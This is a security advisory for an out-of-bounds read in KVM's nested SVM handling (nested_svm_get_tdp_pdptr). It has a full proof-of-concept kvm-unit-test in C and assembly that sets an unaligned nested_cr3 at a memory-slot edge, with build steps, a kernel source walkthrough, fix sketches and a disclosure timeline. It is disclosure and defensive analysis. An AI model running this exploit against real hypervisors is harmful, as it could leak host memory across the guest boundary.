Summary
An Out-Of-Bounds (OOB) read affecting KVM since v3.10 was discovered in arch/x86/kvm/svm/nested.c. The memory read is from the user-space process managing the associated KVM-based Virtual Machine (VM). The values passed from nested_svm_get_tdp_pdptr are not masked to prevent the access from crossing a page boundary, and __kvm_read_guest_page lacks similar validation.
Severity
Moderate - The nested_svm_get_tdp_pdptr function allows a guest Virtual Machine Monitor (VMM) to read memory OOB from its guest physical address (GPA) space. The data read is used to construct Nested Page Tables (NPT) and could be used to indirectly leak memory in the host virtual address (HVA) space.
QEMU was used to develop the PoC and results in __copy_from_user returning an error and __kvm_read_guest_page returning -EFAULT. This is because QEMU adds a guard page directly before and after each region. Other products utilizing KVM could have different outcomes.
Proof-of-Concept
A kvm-unit-test was developed to create a 32-bit protected mode nested-VMM with PAE enabled. It uses existing code from the project and switches a nested-VMM from 64-bit long mode to the required system state and back after executing the VMRUN instruction. This setup triggers the nested_svm_get_tdp_pdptr execution path in KVM.
Modifying the vmcb->control.nested_cr3 value to a GPA at the edge of any memory slot will cause the OOB read access to take place. There are multiple locations that meet these criteria, but they change based on attached virtual devices and the amount of memory.
Testing with QEMU resulted in a return value of -EFAULT because it places guard pages at the start and end of every memory region exposed to the VM. Other applications leveraging KVM could have different results.
Build and Run with kvm-unit-test
- Copy svm_p32pae_ncr3.c and _svm_p32pae_ncr3.S to the x86 directory
- Update Makefile.x86_64 in the x86 directory to include the contents from the snippet below
- Run QEMU with qemu-system-x86_64 -cpu host -m size=2048 -serial stdio -kernel svm_p32pae_ncr3.flat
// Makefile.x86_64
...
# add this line right before the "include $(SRCDIR)/$(TEST_DIR)/Makefile.common" line
tests += $(TEST_DIR)/svm_p32pae_ncr3.$(exe)
...
# add this line to the end of the file
$(TEST_DIR)/svm_p32pae_ncr3.$(bin): $(TEST_DIR)/svm_p32pae_ncr3.o $(TEST_DIR)/_svm_p32pae_ncr3.o
// svm_p32pae_ncr3.c
#include "x86/fwcfg.h"
#include "x86/msr.h"
#include "x86/processor.h"
#include "alloc_page.h"
#include "desc.h"
#include "vmalloc.h"
#include "x86/asm/page.h"
#include "alloc_phys.h"
#define SVM_EXIT_VMMCALL 0x081
#define SVM_EXIT_SHUTDOWN 0x07f
#define SVM_EXIT_NPF 0x400
#define MSR_BITMAP_SIZE 8192
#define TLB_CONTROL_FLUSH_ALL_ASID 1
#define SVM_SELECTOR_S_SHIFT 4
#define SVM_SELECTOR_P_SHIFT 7
#define SVM_SELECTOR_DB_SHIFT 10
#define SVM_SELECTOR_G_SHIFT 11
#define SVM_SELECTOR_S_MASK (1 << SVM_SELECTOR_S_SHIFT)
#define SVM_SELECTOR_P_MASK (1 << SVM_SELECTOR_P_SHIFT)
#define SVM_SELECTOR_DB_MASK (1 << SVM_SELECTOR_DB_SHIFT)
#define SVM_SELECTOR_G_MASK (1 << SVM_SELECTOR_G_SHIFT)
enum {
INTERCEPT_INTR,
INTERCEPT_NMI,
INTERCEPT_SMI,
INTERCEPT_INIT,
INTERCEPT_VINTR,
INTERCEPT_SELECTIVE_CR0,
INTERCEPT_STORE_IDTR,
INTERCEPT_STORE_GDTR,
INTERCEPT_STORE_LDTR,
INTERCEPT_STORE_TR,
INTERCEPT_LOAD_IDTR,
INTERCEPT_LOAD_GDTR,
INTERCEPT_LOAD_LDTR,
INTERCEPT_LOAD_TR,
INTERCEPT_RDTSC,
INTERCEPT_RDPMC,
INTERCEPT_PUSHF,
INTERCEPT_POPF,
INTERCEPT_CPUID,
INTERCEPT_RSM,
INTERCEPT_IRET,
INTERCEPT_INTn,
INTERCEPT_INVD,
INTERCEPT_PAUSE,
INTERCEPT_HLT,
INTERCEPT_INVLPG,
INTERCEPT_INVLPGA,
INTERCEPT_IOIO_PROT,
INTERCEPT_MSR_PROT,
INTERCEPT_TASK_SWITCH,
INTERCEPT_FERR_FREEZE,
INTERCEPT_SHUTDOWN,
INTERCEPT_VMRUN,
INTERCEPT_VMMCALL,
INTERCEPT_VMLOAD,
INTERCEPT_VMSAVE,
INTERCEPT_STGI,
INTERCEPT_CLGI,
INTERCEPT_SKINIT,
INTERCEPT_RDTSCP,
INTERCEPT_ICEBP,
INTERCEPT_WBINVD,
INTERCEPT_MONITOR,
INTERCEPT_MWAIT,
INTERCEPT_MWAIT_COND,
};
struct __attribute__((__packed__)) vmcb_seg {
u16 selector;
u16 attrib;
u32 limit;
u64 base;
};
struct __attribute__((__packed__)) vmcb_control_area {
u16 intercept_cr_read;
u16 intercept_cr_write;
u16 intercept_dr_read;
u16 intercept_dr_write;
u32 intercept_exceptions;
u64 intercept;
u8 reserved_1[42];
u16 pause_filter_count;
u64 iopm_base_pa;
u64 msrpm_base_pa;
u64 tsc_offset;
u32 asid;
u8 tlb_ctl;
u8 reserved_2[3];
u32 int_ctl;
u32 int_vector;
u32 int_state;
u8 reserved_3[4];
u32 exit_code;
u32 exit_code_hi;
u64 exit_info_1;
u64 exit_info_2;
u32 exit_int_info;
u32 exit_int_info_err;
u64 nested_ctl;
u8 reserved_4[16];
u32 event_inj;
u32 event_inj_err;
u64 nested_cr3;
u64 lbr_ctl;
u32 clean;
u32 reserved_5;
u64 next_rip;
u8 insn_len;
u8 insn_bytes[15];
u8 reserved_6[800];
};
struct __attribute__((__packed__)) vmcb_save_area {
struct vmcb_seg es;
struct vmcb_seg cs;
struct vmcb_seg ss;
struct vmcb_seg ds;
struct vmcb_seg fs;
struct vmcb_seg gs;
struct vmcb_seg gdtr;
struct vmcb_seg ldtr;
struct vmcb_seg idtr;
struct vmcb_seg tr;
u8 reserved_1[43];
u8 cpl;
u8 reserved_2[4];
u64 efer;
u8 reserved_3[112];
u64 cr4;
u64 cr3;
u64 cr0;
u64 dr7;
u64 dr6;
u64 rflags;
u64 rip;
u8 reserved_4[88];
u64 rsp;
u8 reserved_5[24];
u64 rax;
u64 star;
u64 lstar;
u64 cstar;
u64 sfmask;
u64 kernel_gs_base;
u64 sysenter_cs;
u64 sysenter_esp;
u64 sysenter_eip;
u64 cr2;
u8 reserved_6[32];
u64 g_pat;
u64 dbgctl;
u64 br_from;
u64 br_to;
u64 last_excp_from;
u64 last_excp_to;
};
struct __attribute__((__packed__)) vmcb {
struct vmcb_control_area control;
struct vmcb_save_area save;
};
struct regs {
u64 rax;
u64 rbx;
u64 rcx;
u64 rdx;
u64 cr2;
u64 rbp;
u64 rsi;
u64 rdi;
u64 r8;
u64 r9;
u64 r10;
u64 r11;
u64 r12;
u64 r13;
u64 r14;
u64 r15;
u64 rflags;
};
void svm_p32pae_ncr3_vm_main(void);
void svm_p32pae_ncr3_run_test(void);
struct regs regs;
struct vmcb *vmcb;
void *hsave;
u64 *pte[2048];
u64 *pde[4];
u64 *pdpe;
u8 *io_bitmap;
u8 io_bitmap_area[16384];
u8 *msr_bitmap;
u8 msr_bitmap_area[MSR_BITMAP_SIZE + PAGE_SIZE];
static void vmcb_set_seg(struct vmcb_seg *seg, u16 selector, u64 base,
u32 limit, u32 attr) {
seg->selector = selector;
seg->attrib = attr;
seg->limit = limit;
seg->base = base;
}
static void svm_p32pae_setup(void) {
struct vmcb_save_area *save = &vmcb->save;
struct vmcb_control_area *ctrl = &vmcb->control;
u64 *page, address;
struct descriptor_table_ptr desc_table_ptr;
int i, j;
printf("svm_p32pae_setup\n");
wrmsr(MSR_VM_HSAVE_PA, (u64)hsave);
wrmsr(MSR_EFER, rdmsr(MSR_EFER) | EFER_SVME);
io_bitmap = (void *)ALIGN((ulong)io_bitmap_area, PAGE_SIZE);
msr_bitmap = (void *)ALIGN((ulong)msr_bitmap_area, PAGE_SIZE);
u32 data_seg_attr = 3 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_P_MASK |
SVM_SELECTOR_DB_MASK | SVM_SELECTOR_G_MASK;
u32 code_seg_attr = 9 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_DB_MASK |
SVM_SELECTOR_P_MASK | SVM_SELECTOR_G_MASK;
memset(vmcb, 0, sizeof(*vmcb));
asm volatile("vmsave %0" : : "a"(vmcb) : "memory");
  // setup es, cs, ds, and ss segments for protected mode
vmcb_set_seg(&save->es, KERNEL_DS32, 0, -1U, data_seg_attr);
vmcb_set_seg(&save->cs, KERNEL_CS32, 0, -1U, code_seg_attr);
vmcb_set_seg(&save->ds, KERNEL_DS32, 0, -1U, data_seg_attr);
vmcb_set_seg(&save->ss, KERNEL_DS32, 0, -1U, data_seg_attr);
sgdt(&desc_table_ptr);
vmcb_set_seg(&save->gdtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);
sidt(&desc_table_ptr);
vmcb_set_seg(&save->idtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);
ctrl->asid = 1;
save->cpl = 0;
save->efer = rdmsr(MSR_EFER) &
~(_EFER_LME | _EFER_LMA); // disable long mode in the guest
save->cr4 = read_cr4();
save->cr0 = read_cr0() & ~X86_CR0_PG; // disable paging in the guest
save->dr7 = read_dr7();
save->dr6 = read_dr6();
save->cr2 = read_cr2();
save->g_pat = rdmsr(MSR_IA32_CR_PAT);
save->dbgctl = rdmsr(MSR_IA32_DEBUGCTLMSR);
ctrl->intercept = (1ULL << INTERCEPT_VMRUN) | (1ULL << INTERCEPT_VMMCALL);
ctrl->iopm_base_pa = (u64)io_bitmap;
ctrl->msrpm_base_pa = (u64)msr_bitmap;
address = 0;
/* PTE level */
for (i = 0; i < 2048; ++i) {
page = alloc_page();
for (j = 0; j < 512; ++j, address += 4096) page[j] = address | 0x067ULL;
pte[i] = page;
}
/* PDE level */
for (i = 0; i < 4; ++i) {
page = alloc_page();
for (j = 0; j < 512; ++j) page[j] = (u64)pte[(i * 512) + j] | 0x027ULL;
pde[i] = page;
}
/* PDPE level */
pdpe = alloc_page();
for (i = 0; i < 4; ++i) pdpe[i] = ((u64)(pde[i])) | 0x01ULL;
save->cr3 = (u64)pdpe;
ctrl->nested_ctl = 1;
ctrl->nested_cr3 = (u64)pdpe;
ctrl->tlb_ctl = TLB_CONTROL_FLUSH_ALL_ASID;
// clear the exit code and info fields
vmcb->control.exit_code = 0;
vmcb->control.exit_info_1 = 0;
vmcb->control.exit_info_2 = 0;
}
int main(int argc, char *argv[]) {
void *stack;
pteval_t opt_mask = 0;
printf("VM Started...\n");
__setup_vm(&opt_mask);
if (!this_cpu_has(X86_FEATURE_SVM)) {
printf("SVM not availble\n");
exit(-1);
}
if (!this_cpu_has(X86_FEATURE_NPT)) {
printf("NPT not availble\n");
exit(-1);
}
vmcb = alloc_page();
hsave = alloc_page();
svm_p32pae_setup();
stack = alloc_page();
vmcb->save.rsp = ((ulong)stack) + PAGE_SIZE;
vmcb->save.rip = (ulong)&svm_p32pae_ncr3_vm_main;
vmcb->save.rax = ~0ULL;
printf("svm_p32pae_ncr3_vm_main @ %p\n", &svm_p32pae_ncr3_vm_main);
// use the nested_cr3 page tables for the vmm page tables
// after the switch to protected mode
regs.rsi = vmcb->control.nested_cr3;
// set nested_cr3 to a gpa that would be at a boundary
// this value was obtained by running `info mtree` from the monitor cli
vmcb->control.nested_cr3 = 0x3fffffff;
svm_p32pae_ncr3_run_test();
printf("guest rip: 0x%lx\n", vmcb->save.rip);
printf("guest rax: 0x%lx\n", vmcb->save.rax);
switch (vmcb->control.exit_code) {
case SVM_EXIT_VMMCALL:
printf("exit_code == SVM_EXIT_VMMCALL\n");
break;
default:
printf("exit_code == %x\n", vmcb->control.exit_code);
break;
}
printf("VM Stopped...\n");
exit(0);
}
// _svm_p32pae_ncr3.S
.extern regs
.extern vmcb
xchg_gprs:
xchg %rbx, regs+0x8
xchg %rcx, regs+0x10
xchg %rdx, regs+0x18
xchg %rbp, regs+0x28
xchg %rsi, regs+0x30
xchg %rdi, regs+0x38
xchg %r8, regs+0x40
xchg %r9, regs+0x48
xchg %r10, regs+0x50
xchg %r11, regs+0x58
xchg %r12, regs+0x60
xchg %r13, regs+0x68
xchg %r14, regs+0x70
xchg %r15, regs+0x78
ret
switch_to_protected_pae_mode:
ljmp *1f
1:
.long 2f
.long 0x20 // KERNEL_CS32
.code32 // switch to 32-bit code
2:
push %eax
push %ecx
push %edx
movl %cr0, %eax
btcl $31, %eax /* clear PG */
movl %eax, %cr0
movl $0xc0000080, %ecx
rdmsr
btcl $8, %eax /* clear LME */
wrmsr
movl %cr3, %eax
movl %esi, %cr3 // restore cr3 from guest esi
movl %eax, %esi
movl %cr0, %eax
btsl $31, %eax /* set PG */
movl %eax, %cr0
ljmpl $0x20, $1f
1:
pop %edx
pop %ecx
pop %eax
ret
.code64 // restore 64-bit code mode
switch_to_long_mode:
.code32 //switch to 32-bit code
push %eax
push %ecx
push %edx
movl %cr0, %eax
btcl $31, %eax /* clear PG */
movl %eax, %cr0
movl %cr3, %eax
movl %esi, %cr3 // restore cr3 from guest esi
movl %eax, %esi
movl $0xc0000080, %ecx
rdmsr
btsl $8, %eax /* set LME */
wrmsr
movl %cr0, %eax
btsl $31, %eax /* set PG */
movl %eax, %cr0
pop %edx // this isn't correct per the amd manual
pop %ecx // but i guess the vm is okay with a few pops
pop %eax // before the switch to long mode
ljmp *1f
1:
.long 2f
.long 0x08 //KERNEL_CS64
.code64 // make this 64-bit code
2:
ret
.global svm_p32pae_ncr3_run_test
svm_p32pae_ncr3_run_test:
call xchg_gprs
call switch_to_protected_pae_mode
.code32
mov vmcb, %eax
vmload %eax
vmrun %eax
//.byte 0xeb, 0xfe
mov vmcb, %eax
vmsave %eax
call switch_to_long_mode
.code64
call xchg_gprs
ret
.global svm_p32pae_ncr3_vm_main
svm_p32pae_ncr3_vm_main:
.code32
mov $0x42424242, %eax
vmmcall
Further Analysis
A guest VMM leveraging AMD’s Secure Virtual Machine (SVM) extensions with NPT enabled can access memory outside of its GPA space by specifying an unaligned NPT Control Register 3 (CR3) value in its Virtual Machine Control Block (VMCB). From protected mode with Physical Address Extension (PAE) enabled, a guest VMM can set NP_ENABLE and populate the N_CR3 field in the VMCB with an unaligned GPA. In this configuration CR3 points to a Page Directory Pointer Table (PDPT) with 4 entries that are 8 bytes each. The VMCB is processed by KVM when the VMRUN instruction is executed by the guest VMM.
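For reference, the guest-controlled VMCB state needed to reach this path reduces to the two control fields shown below. This excerpt simply mirrors the PoC above; the slot-edge GPA of 0x3fffffff was found with QEMU's "info mtree" and will differ on other configurations.
// VMCB control fields set by the PoC to reach nested_svm_get_tdp_pdptr
ctrl->nested_ctl = 1;           // enable nested paging (SVM_NESTED_CTL_NP_ENABLE)
ctrl->nested_cr3 = 0x3fffffff;  // unaligned GPA at the edge of a memory slot
// VMRUN is then executed from 32-bit protected mode with PAE enabled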
KVM uses a function pointer in the kvm_mmu structure named get_pdptr to load a PDPT register. When a nested-VMM has SVM_NESTED_CTL_NP_ENABLE set in nested_ctl, that function pointer is set to nested_svm_get_tdp_pdptr.
When nested_svm_get_tdp_pdptr is called, the nested_cr3 value in the svm->nested.ctl structure contains the guest VMM controlled GPA of the PDPT and is loaded into the local u64 cr3 variable. It is then used to compute the gfn_t gfn with gpa_to_gfn(cr3) and the int offset with offset_in_page(cr3) + index * 8. These values are passed to kvm_vcpu_read_guest_page.
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/kvm_host.h
static inline gfn_t gpa_to_gfn(gpa_t gpa)
{
return (gfn_t)(gpa >> PAGE_SHIFT);
}
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/mm.h
#define offset_in_page(p) ((unsigned long)(p) & ~PAGE_MASK)
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kvm/svm/nested.c
static u64 nested_svm_get_tdp_pdptr(struct kvm_vcpu *vcpu, int index)
{
struct vcpu_svm *svm = to_svm(vcpu);
u64 cr3 = svm->nested.ctl.nested_cr3;
u64 pdpte;
int ret;
ret = kvm_vcpu_read_guest_page(vcpu, gpa_to_gfn(cr3), &pdpte,
offset_in_page(cr3) + index * 8, 8);
if (ret)
return 0;
return pdpte;
}
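For concreteness, the following stand-alone sketch (user-space C, not kernel code; it only assumes the 4 KiB page size used above) reproduces the gfn/offset arithmetic for the PoC's nested_cr3 value of 0x3fffffff and shows that every 8-byte PDPTE read ends past the boundary of the page belonging to the gfn that gets validated:
// oob_offsets.c - illustrative arithmetic only, not kernel code
#include <stdio.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)

int main(void)
{
    uint64_t cr3 = 0x3fffffffULL; // unaligned GPA at the edge of a memory slot

    for (int index = 0; index < 4; index++) {
        uint64_t gfn    = cr3 >> PAGE_SHIFT;                    // gpa_to_gfn(cr3)
        uint64_t offset = (cr3 & (PAGE_SIZE - 1)) + index * 8;  // offset_in_page(cr3) + index * 8

        // offset + 8 is greater than PAGE_SIZE for every index, so each
        // 8-byte read extends beyond the page backing the checked gfn
        printf("index %d: gfn=0x%llx offset=0x%llx end=0x%llx\n", index,
               (unsigned long long)gfn, (unsigned long long)offset,
               (unsigned long long)(offset + 8));
    }
    return 0;
}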
kvm_vcpu_read_guest_page uses the gfn_t gfn to get the kvm_memory_slot *slot and calls __kvm_read_guest_page. __kvm_read_guest_page uses the gfn_t gfn passed to get a HVA using gfn_to_hva_memslot_prot and then calls __copy_from_user with addr + offset.
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/virt/kvm/kvm_main.c
int kvm_vcpu_read_guest_page(struct kvm_vcpu *vcpu, gfn_t gfn, void *data,
int offset, int len)
{
struct kvm_memory_slot *slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);
 return __kvm_read_guest_page(slot, gfn, data, offset, len);
}
static int __kvm_read_guest_page(struct kvm_memory_slot *slot, gfn_t gfn,
void *data, int offset, int len)
{
int r;
unsigned long addr;
addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
if (kvm_is_error_hva(addr))
return -EFAULT;
r = __copy_from_user(data, (void __user *)addr + offset, len);
if (r)
return -EFAULT;
return 0;
}
Because CR3 in protected mode with PAE enabled only needs to be 32-byte aligned, and KVM does not perform any alignment checking on the nested_cr3 value, it can be set to any address in the GPA space.
It should be noted that "Volume 2: System Programming" of the "AMD64 Architecture Programmer’s Manual" does not identify any bits of the N_CR3 field as RESERVED, SBZ, or otherwise in "Appendix B VMCB Layout" as it does for other fields in Table B-1. Section 15.25.4 does describe nCR3 as "the version of CR3 to be used while the nested-paging guest is running", and then lists "Any MBZ bit of nCR3 is set" as an illegal state combination. Lastly, Figure 3-5 describes CR3 in "Legacy-Mode PAE Paging" as only using bits 31:5 for the address.
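Given the Legacy-Mode PAE CR3 format above (address bits 31:5), one way a caller could sanitize the value is to mask off the low five bits before deriving the gfn and offset. The helper below is a sketch of that idea only; pae_pdpt_base is a hypothetical name introduced here for illustration, and this is not presented as the upstream fix.
// Sketch only: clamp an N_CR3 value to the 32-byte-aligned PDPT base
// defined by the legacy PAE CR3 format (address bits 31:5)
static inline u64 pae_pdpt_base(u64 ncr3)
{
	return ncr3 & ~0x1fULL;
}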
For example, if a guest VMM set N_CR3 in the VMCB to the last page of a memory slot with an offset of 0xfff and executed VMRUN, the following would occur:
- nested_svm_get_tdp_pdptr would be called and use the guest VMM controlled N_CR3 to compute the gfn and offset passed to kvm_vcpu_read_guest_page
- gpa_to_gfn(cr3) would pass the gfn associated with the nested_cr3 value
- offset_in_page(cr3) + index * 8 would pass 0xfff, 0x1007, 0x100f, or 0x1017 based on index, which can be 0 through 3
- kvm_vcpu_read_guest_page gets the slot for the nested_cr3 gfn and calls __kvm_read_guest_page
- __kvm_read_guest_page calls gfn_to_hva_memslot_prot to get the HVA and checks it with kvm_is_error_hva
- __copy_from_user is called after adding addr + offset, which results in a read across the page boundary and outside of the memory slot previously checked
- If this read succeeded, the value returned would be used by KVM as a pdptr; if it failed, -EFAULT would be returned
nested_cr3 could be checked to ensure that it is 32-byte aligned, but this bug identifies a larger issue with the underlying __kvm_read_guest_page function. Specifically, if this function is meant to operate on a single page, as the name implies, it needs to ensure the entire access is within page bounds.
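As a sketch of that idea, a bounds check ahead of the copy in __kvm_read_guest_page could reject any access extending past the page that gfn_to_hva_memslot_prot translated. This is illustrative only and is not presented as the patch that was merged.
// Sketch: fragment of __kvm_read_guest_page with an added page-bounds check
	addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
	if (kvm_is_error_hva(addr))
		return -EFAULT;
	// refuse reads that would cross out of the page backing this gfn
	if (offset < 0 || len < 0 || offset + len > PAGE_SIZE)
		return -EFAULT;
	r = __copy_from_user(data, (void __user *)addr + offset, len);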
The addition of nested virtualization presents an indirect interface from a VM to KVM, through the VMCB for AMD CPUs, that wasn't previously controllable by a VM. Existing code that was updated to support this functionality should be reviewed further to ensure inputs are properly validated.
Timeline
Date reported: 08/27/2024
Date fixed: 11/05/2024
Date disclosed: 12/09/2024